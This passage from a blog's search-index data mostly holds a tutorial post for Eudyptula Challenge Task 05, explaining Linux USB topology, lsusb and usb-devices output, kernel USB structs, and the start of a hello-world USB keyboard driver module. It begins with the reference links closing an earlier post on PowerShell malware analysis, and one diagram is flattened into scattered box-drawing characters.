understand about Windows malware analysis)\nFor now, I just have a few leads to pursue, but maybe in the future I\u0026rsquo;ll figure it all the way down and find out exactly what this program does. Till then\u0026hellip;\nhttps://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.offensive-security.com/offsec/powershell-obfuscation/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://rada.re/n/radare2.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/08/analyzing-simple-powershell-malware/","summary":"What is a malware? Malware, a portmanteu meaning malicious software, refers to any program that was created with the specific goal of doing harm. Your digital environment is vulnerable to a variety of terrible things, including attempts to compromise your computer or network, leak confidential data, and gain illegal access. These issues can occasionally be brought on by common software defects, but when malware is to blame, it poses a major risk to online users and businesses.","title":"Analyzing Simple Powershell Malware"},{"content":"This is Task 05 of the Eudyptula Challenge ------------------------------------------ Yeah, you survived the coding style mess! Now, on to some \u0026#34;real\u0026#34; things, as I know you are getting bored by these so far. So, simple task this time around: - take the kernel module you wrote for task 01, and modify it so that when a USB keyboard is plugged in, the module will be automatically loaded by the correct userspace hotplug tools (which are implemented by depmod / kmod / udev / mdev / systemd, depending on what distro you are using.) Yes, so simple, and yet, it\u0026#39;s a bit tricky. As a hint, go read chapter 14 of the book, \u0026#34;Linux Device Drivers, 3rd edition.\u0026#34; Don\u0026#39;t worry, it\u0026#39;s free, and online, no need to go buy anything. What is USB?? Ofcourse, we know what a USB is!! We use it everyday with our digital devices like pen-drive, external harddisks, chargers, digital camera, keyboard, mice, wifi dongle, etc\u0026hellip;USB devices and connectors are popular with everyone, even with people without any IT background. It is so famous and well known that it has got it\u0026rsquo;s own website 1 and a Wikipedia page 2.\nIn early days, just before USB appeared, peripherals like keyboards, mouse and printers were connected with serial and parallel ports. Problem with that was if you accidentally stuck a mouse into the socket for keyboard, it won\u0026rsquo;t work. And that\u0026rsquo;s not it, once you successfully connect the device in the correct socket..you now need to install the proper driver for it.\nIf all went well, a quick reboot after the driver install and you\u0026rsquo;ll have your working device ready to be used. Naturally, people would want something better and easy than this - \u0026ldquo;One port to rule them all\u0026rdquo;\nAnd soon, the USB (Universal Serial Bus) was born as a replacement for the serial, parallel and PS/2 ports.\nThe USB specification went on to have several revisions, with the major ones being 2.0 in 2001, 3.0 in 2008, and the very latest spec (4.0) released in 2019. Let\u0026rsquo;s take a look at how USBs work.\nUSB in linux Linux kernel has a dedicated sub-system to handle USB, you can read everything about it in detail from here 3\nLet me start with a terminal command to begin explaining things. There are utilities that can help you to identify the system hardware\u0026hellip;you can find any device connected to your system, more specifically you can get the USBs attached with lsusb command\n# COMMAND -\u0026gt; lsusb --tree --verbose /: Bus 01.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/6p, 5000M ID PP01:VV02 Linux Foundation 3.0 root hub /: Bus 02.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/12p, 480M ID PP01:VV01 Linux Foundation 2.0 root hub |__ Port 1: Dev 2, If 1, Class=Human Interface Device, Driver=usbhid, 12M ID 046d:c534 Logitech, Inc. Unifying Receiver |__ Port 1: Dev 2, If 0, Class=Human Interface Device, Driver=usbhid, 12M ID 046d:c534 Logitech, Inc. Unifying Receiver |__ Port 5: Dev 3, If 1, Class=Wireless, Driver=btusb, 12M ID PP03:VV03 Lite-On Technology Corp. Qualcomm Atheros QCA9377 Bluetooth |__ Port 5: Dev 3, If 0, Class=Wireless, Driver=btusb, 12M ID PP03:VV03 Lite-On Technology Corp. Qualcomm Atheros QCA9377 Bluetooth |__ Port 7: Dev 4, If 0, Class=Video, Driver=uvcvideo, 480M ID PP04:VV04 Realtek Semiconductor Corp. |__ Port 7: Dev 4, If 1, Class=Video, Driver=uvcvideo, 480M ID PP04:VV04 Realtek Semiconductor Corp. This output shows a list of USB host controllers (Bus 02 and Bus 01) and the actual physical devices connected to them. At then end of each line, the negotiated speed limits are shown in Mbits/s. There are different negotiated speeds for different kinds of devices.\nFull speed mode (12 Mbits/s) is used for communicating with keyboard, mice and other similar devices. Hi-Speed mode (480 Mbit/s) is used for communication with storage devices, webcams, and other devices which demand more bandwidth. Ports with 5000 Mbits/s (5Gbits/s) is USB 3.0 port. As the output shows, my laptop has two USB host controllers. One of them is USB3(5000 Mbits/s) and another is USB2(480 Mbits/s). Both of them are managed by xhci_hcd/6p and xhci_hcd/12p driver respectively.\nThe device numbers (Dev 1, Dev2, \u0026hellip;) are just numbers given by kernel to identify each device. If you eject and plug the same USB you might get another device number for it.\nNow, let\u0026rsquo;s focus on bus #02. This bus has 3 types/class of devices connected to it:-\nHuman Interface Device (for my keyboard and mice) Wireless (for Bluetooth adapter card) Video (for video camera) Each USB device contains a vendor ID and a product ID which helps programs to detect the device and load proper driver for it. To clarify, companies pay to acquire Vendor IDs from the USB Implementers Forum. A complete list of vendor IDs with their respective product ID can be found here 4\nUSB implementation is complex by design. There are tons of things that are abstracted from the regular users\u0026hellip; but for a kernel developer working on USB device drivers, it is very useful to know how things work beyond the simple abstraction layer.\nMore USB info There is some information that lsusb do not provide, to make things easy for end user\u0026hellip; We can use usb-devices command for that stuff.\nT: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=480 MxCh=12 D: Ver= 2.00 Cls=09(hub ) Sub=00 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0002 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 2.00 Cls=00(\u0026gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=046d ProdID=c534 Rev=29.01 S: Manufacturer=Logitech S: Product=USB Receiver C: #Ifs= 2 Cfg#= 1 Atr=a0 MxPwr=98mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=01 Driver=usbhid E: Ad=81(I) Atr=03(Int.) MxPS= 8 Ivl=8ms I: If#= 1 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=02 Driver=usbhid E: Ad=82(I) Atr=03(Int.) MxPS= 20 Ivl=2ms T: Bus=02 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=5000 MxCh= 6 D: Ver= 3.00 Cls=09(hub ) Sub=00 Prot=03 MxPS= 9 #Cfgs= 1 P: Vendor=1d6b ProdID=0003 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms This definitely gives more information than the previous command\u0026hellip; but it is all alien looking at first glance. Slowly, you can see that few bits are not so alien after all. We can get the Bus, Port, Spd(Speed), Cls, Vendor, ProdID from the above output as we were able to via lsusb command.\nNow it\u0026rsquo;s time to understand more about USBs and get into the abstraction layer and dig deeper.\nTypically, USB devices uses it\u0026rsquo;s own file-system on linux, which is a dynamically generated file-system that complements the normal device node system, and can be used to write user space device drivers. Just remember that this is not always the case.\nIrrespective of what the case is, you can get above output (or something similar) using multitude of tools/utilities\u0026hellip; you can just focus on understanding the output of such tools/utilities for now.\nThe information in the above output is arranged in groups and each group has 1 character that actually indicates the type of the information written in that specific line. See below table for complete list:\nCharacter Meaning T Topology information D Device Descriptor information P Similar to D; Product info (fetched from device descriptor info S String info; returned by device C Configuration Descriptor information I Interface Descriptor information E Endpoint Descriptor information To get a complete understanding of the above, we need more knowledge around how USB system works inside linux kernel\u0026hellip; Or more specifically, how usb endpoints, Interfaces and configurations all fit together in the topology.\nAccording to USB protocol (standardized by USB Implementers Forum or USB-IF folks), USB is a cable bus that supports data exchange between host computer and a wide range of simultaneously accessible peripherals.\nUSB protocol uses star-topology starting from a single node called \u0026ldquo;host\u0026rdquo; or \u0026ldquo;root-hub\u0026rdquo; with branches to other nodes. These nodes could be another level hub or simply a functional peripheral device (device used by user).\nBecause of this topology, USB device can never start sending data without being asked first\u0026hellip; So it makes USB host controller in-charge of asking every USB device if it has any data to send. This allows for a very easy plug-n-play type of system, where devices can be easily configured by the host computer.\nTo remove the necessity of special drivers for different kind of devices, USB protocol specifications has defined some set of standards that any device of a specific type can follow. These types are called classes. Complete list of USB specified classes can be found here 5 with their class codes.\nThe idea of installing drivers for each and every USB device (manually) and then rebooting the system is very scary to me. This type of specification helps a lot. Still if there are some special devices which you need to work with, then you can install the special device driver for that and it\u0026rsquo;ll still work. It means, you get support for most kinds of USB devices by default and you can still add more support without changing anything in the design.\nUnfortunately, USB protocol specification is a multi-layer protocol specification which makes USBs a lot more complex and abstracted than we expected. Fortunately, most of this complexity is handled by USB core subsystem 6.\nLinux Device drivers (normally implemented as a loadable kernel modules) have to set up few thing before they can actually start functioning as USB devices. Few of these things involve setting up configurations, interfaces and endpoints; And then binding USB device to USB interface.\nEndpoints Most basic form of USB communication is through endpoints. Endpoints are like pipes which carry data in a single direction (a unidirectional pipe) only, either from my laptop to device (OUT endpoint) or from the USB device to my laptop (IN endpoint).\nEach endpoint has an associated DescrptorType to it which defines how the data is transmitted through that endpoint. There can be 4 different type of such descriptors:-\nCONTROL\nNormally used to configure, retrieve info, send info or get status reports about the device. Every USB has a control endpoint with associated number = 0 INTERRUPT\ntransfers small amounts of data at fixed rate every time somebody asks device for data. Usually used with keyboard and mice; anywhere we need to send a signal to device using buttons or similar methods. BULK\nTransfer larger amounts to data with no data loss. Common for printer, storage and network devices. ISOCHRONOUS\nAlso transfer large amounts of data, but data loss is possible. Usually for real time devices or any constant streaming data. Commonly found in audio and video devices. In linux kernel, this is implemented using struct usb_host_endpoint 7\nstruct usb_host_endpoint { struct usb_endpoint_descriptor\tdesc; struct usb_ss_ep_comp_descriptor\tss_ep_comp; struct usb_ssp_isoc_ep_comp_descriptor\tssp_isoc_ep_comp; struct list_head\turb_list; void\t*hcpriv; struct ep_device\t*ep_dev;\t/* For sysfs info */ unsigned char *extra; /* Extra descriptors */ int extralen; int enabled; int streams; }; Each endpoint has their own descriptor attached to it, which is defined with struct usb_endpoint_descriptor 8 . This structure contains the actual information provided by the device.\n/* USB_DT_ENDPOINT: Endpoint descriptor */ struct usb_endpoint_descriptor { __u8 bLength; __u8 bDescriptorType; __u8 bEndpointAddress; __u8 bmAttributes; __le16 wMaxPacketSize; __u8 bInterval; /* NOTE: these two are _only_ in audio endpoints. */ /* use USB_DT_ENDPOINT*_SIZE in bLength, not sizeof. */ __u8 bRefresh; __u8 bSynchAddress; } __attribute__ ((packed)); We can already see that there is a bDescriptorType variable in the struct usb_endpoint_descriptor. This is what defines the type of the endpoint - either Control, Interrupt, Bulk or Isochronous. Along with this, this field also contains the direction of the endpoint - either IN or OUT. The bit-masks USB_DIR_OUT and USB_DIR_IN can be placed against this field to determine the direction of the endpoint.\nInterfaces Zero or more of such endpoints are bundled up into an Interface. These interfaces handle only one type of USB connection - such as mouse, touch-pad, keyboard, storage, video stream, etc.. USB interfaces may have alternate settings, which are different choices for parameters of the interface. In kernel, this is implemented as struct usb_interface 9 .\nstruct usb_interface { /* array of alternate settings for this interface, * stored in no particular order */ struct usb_host_interface *altsetting; struct usb_host_interface *cur_altsetting;\t/* the currently * active alternate setting */ unsigned num_altsetting;\t/* number of alternate settings */ int minor;\t/* minor number this interface is * bound to */ ... snip snip ... }; struct usb_interface is the structure which USB core passes to USB drivers and what the USB driver is then in charge of. Each usb_interface can have multiple settings, but only one setting will be used at a point in time. These settings are defined in another struct struct usb_host_interface. 10\nstruct usb_host_interface { struct usb_interface_descriptor\tdesc; int extralen; unsigned char *extra; /* Extra descriptors */ /* array of desc.bNumEndpoints endpoints associated with this * interface setting. these will be in no particular order. */ struct usb_host_endpoint *endpoint; char *string;\t/* iInterface string, if present */ }; struct usb_host_interface contains a struct usb_host_endpoint which is the USB endpoint structure we discussed above.\nConfigurations One or more USB interfaces are themselves bundled in a USB configuration. A USB device can have multiple configurations and might switch between them in order to change the state of the device.\nIn linux kernel, It is defined as struct usb_host_config 11 .\nstruct usb_host_config { struct usb_config_descriptor\tdesc; char *string;\t/* iConfiguration string, if present */ /* List of any Interface Association Descriptors in this * configuration. */ struct usb_interface_assoc_descriptor *intf_assoc[USB_MAXIADS]; /* the interfaces associated with this configuration, * stored in no particular order */ struct usb_interface *interface[USB_MAXINTERFACES]; /* Interface information available even when this is not the * active configuration */ struct usb_interface_cache *intf_cache[USB_MAXINTERFACES]; unsigned char *extra; /* Extra descriptors */ int extralen; }; Linux defines the USB configurations as above struct usb_host_config and the entire USB device as struct usb_device 12\n┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ - ─ ─ ─ ─ R ─ ─ e ─ ─ l ─ ─ a ─ ─ t ─ D ─ i ─ e ─ o ─ v ─ n ─ i ─ s ─ c ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ h ─ e ─ ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ p ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ l ─ ─ C ─ ─ ─ ─ C ─ ─ ─ ─ a ─ ─ O ─ ─ ─ ─ O ─ ─ ─ ─ y ─ ─ N ─ ─ ─ ─ N ─ ─ ─ ─ o ─ ─ F ─ I ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ F ─ I ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ u ─ ─ I ─ n ─ ─ ─ ─ ─ ─ ─ I ─ n ─ ─ ─ ─ ─ ─ ─ t ─ ─ G ─ t ─ ─ ─ ─ ─ ─ ─ G ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ o ─ ─ 1 ─ r ─ E ─ ─ E ─ ─ ─ ─ 2 ─ r ─ E ─ ─ E ─ ─ ─ ─ f ─ ─ ─ f ─ N ─ ─ N ─ ─ ─ ─ ─ f ─ N ─ ─ N ─ ─ ─ ─ ─ ─ ─ a ─ D ─ ─ D ─ ─ ─ ─ ─ a ─ D ─ ─ D ─ ─ ─ ─ e ─ ─ ─ c ─ P ─ ─ P ─ ─ ─ ─ ─ c ─ P ─ ─ P ─ ─ ─ ─ n ─ ─ ─ e ─ O ─ ─ O ─ ─ ─ ─ ─ e ─ O ─ ─ O ─ ─ ─ ─ d ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ p ─ ─ ─ 1 ─ N ─ ─ N ─ ─ ─ ─ ─ 1 ─ N ─ ─ N ─ ─ ─ ─ o ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ n ─ ─ ─ ─ 1 ─ ─ 1 ─ ─ ─ ─ ─ ─ 1 ─ ─ 1 ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ s ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ , ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ n ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ r ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ f ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ a ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ c ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ s ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ a ─ ─ ─ ─ ─ ─ n ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ d ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ c ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ o ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ n ─ ─ ─ I ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ ─ I ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ f ─ ─ ─ n ─ ─ ─ ─ ─ ─ ─ ─ n ─ ─ ─ ─ ─ ─ ─ i ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ g ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ u ─ ─ ─ r ─ E ─ ─ E ─ ─ ─ ─ ─ r ─ E ─ ─ E ─ ─ ─ ─ r ─ ─ ─ f ─ N ─ ─ N ─ ─ ─ ─ ─ f ─ N ─ ─ N ─ ─ ─ ─ a ─ ─ ─ a ─ D ─ ─ D ─ ─ ─ ─ ─ a ─ D ─ ─ D ─ ─ ─ ─ t ─ ─ ─ c ─ P ─ ─ P ─ ─ ─ ─ ─ c ─ P ─ ─ P ─ ─ ─ ─ i ─ ─ ─ e ─ O ─ ─ O ─ ─ ─ ─ ─ e ─ O ─ ─ O ─ ─ ─ ─ o ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ n ─ ─ ─ 2 ─ N ─ ─ N ─ ─ ─ ─ ─ 2 ─ N ─ ─ N ─ ─ ─ ─ s ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ w ─ ─ ─ ─ 2 ─ ─ 2 ─ ─ ─ ─ ─ ─ 2 ─ ─ 2 ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ h ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ d ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ v ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ i ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ c ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ I ─ ─ ─ ─ I ─ ─ ─ ─ ─ ─ n ─ ─ ─ ─ n ─ ─ ─ ─ ─ ─ t ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ ─ t ┌ │ │ │ └ ┌ │ │ │ └ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ f ─ ─ ─ ─ ─ ─ ─ ─ f ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ a ─ E ─ ─ E ─ ─ ─ ─ ─ a ─ E ─ ─ E ─ ─ ─ ─ ─ ─ ─ c ─ N ─ ─ N ─ ─ ─ ─ ─ c ─ N ─ ─ N ─ ─ ─ ─ ─ ─ ─ e ─ D ─ ─ D ─ ─ ─ ─ ─ e ─ D ─ ─ D ─ ─ ─ ─ ─ ─ ─ ─ P ─ ─ P ─ ─ ─ ─ ─ ─ P ─ ─ P ─ ─ ─ ─ ─ ─ ─ 3 ─ O ─ ─ O ─ ─ ─ ─ ─ 3 ─ O ─ ─ O ─ ─ ─ ─ ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ ─ ─ I ─ ─ I ─ ─ ─ ─ ─ ─ ─ ─ N ─ ─ N ─ ─ ─ ─ ─ ─ N ─ ─ N ─ ─ ─ ─ ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ ─ ─ T ─ ─ T ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 3 ─ ─ 3 ─ ─ ─ ─ ─ ─ 3 ─ ─ 3 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ ─ ┐ │ │ │ ┘ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┘ So to summarize,\nDevices usually have 1 or more configurations. Configs have 1 or more interfaces. Interfaces have 1 or more settings. Interfaces have 0 or more endpoints. Understanding output of usb-devices Looking back at the output of usb-devices command, with the newly gained knowledge, we can now understand few more things from the command output.\n# COMMAND --\u0026gt; usb-devices T: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=480 MxCh=12 D: Ver= 2.00 Cls=09(hub ) Sub=00 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0002 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 2.00 Cls=00(\u0026gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=046d ProdID=c534 Rev=29.01 S: Manufacturer=Logitech S: Product=USB Receiver C: #Ifs= 2 Cfg#= 1 Atr=a0 MxPwr=98mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=01 Driver=usbhid E: Ad=81(I) Atr=03(Int.) MxPS= 8 Ivl=8ms I: If#= 1 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=02 Driver=usbhid E: Ad=82(I) Atr=03(Int.) MxPS= 20 Ivl=2ms T: Bus=02 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=5000 MxCh= 6 D: Ver= 3.00 Cls=09(hub ) Sub=00 Prot=03 MxPS= 9 #Cfgs= 1 P: Vendor=1d6b ProdID=0003 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms We already know that the output is grouped and what these characters at the most-left side mean. We now just need to map what rest of the things mean and how they relate to all what we have just learned.\nSo the first line in each group starts with T, which indicates the information in that line is related to topology of the device. Bus indicates what physical bus that device is connected to. Lev indicates the level of the node in the complete topology of that bus. Level 00 means it is the root hub. Next, level 01 will be any device connected to the main root hub (00) and all the devices connected to 01 hubs will be treated as level 02 devices and so on. Spd indicates the negotiated speed of that node. MxCh indicates how many devices can be connected to this device, and is 00 for anything except a hub.\nNext line, starting with D, this shows the device information like Ver for USB version (mostly, 2 or 3 for now), Cls (class) of the device node. If this is marked as 00, then the interface should be read for the device class information. Sub indicates the sub-class of the node. #Cfgs indicate how many configurations this device has.\nNext lines with P and S are usually the Vendor and Product IDs. Useful information if we want to write a driver for specific kinds of devices.\nThen the remaining lines, starting with C, I and E, are the Configuration info, Interface info and the Endpoint info respectively. #Ifs tells about the total number of interfaces available for that device. Cfg# indicates the total number of available configurations for the device. Atr stores a hexadecimal value to indicate if the device is bus-powered(0x80), self-powered(0x40) or remote wake-up capable(0x20). #Eps indicates the endpoints for this alternate endpoint.\nUSB driver - code walk-through At this point, we roughly know what USB is comprised of and how it works inside linux kernel. Let\u0026rsquo;s dig in the code.\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/usb.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/hid.h\u0026gt; static int hello_connect(struct usb_interface *interface, const struct usb_device_id *id) { pr_alert(\u0026#34;USB plugged in.\\n\u0026#34;); return 0; } static void hello_disconnect(struct usb_interface *interface) { pr_alert(\u0026#34;USB disconnected.\\n\u0026#34;); } static const struct usb_device_id id_table[] = { { USB_INTERFACE_INFO( USB_INTERFACE_CLASS_HID, USB_INTERFACE_SUBCLASS_BOOT, USB_INTERFACE_PROTOCOL_KEYBOARD ) }, { USB_DEVICE( 0x058f, // Vendor Id 0x6387 // Product Id ) }, {}, // End node - always null }; MODULE_DEVICE_TABLE(usb, id_table); static struct usb_driver driver = { .name = \u0026#34;ayedaemonUSB\u0026#34;, .probe = hello_connect, .disconnect = hello_disconnect, .id_table = id_table, }; static int __init hello_usb(void) { pr_debug(\u0026#34;Hello from ayedaemonUSB.\\n\u0026#34;); return 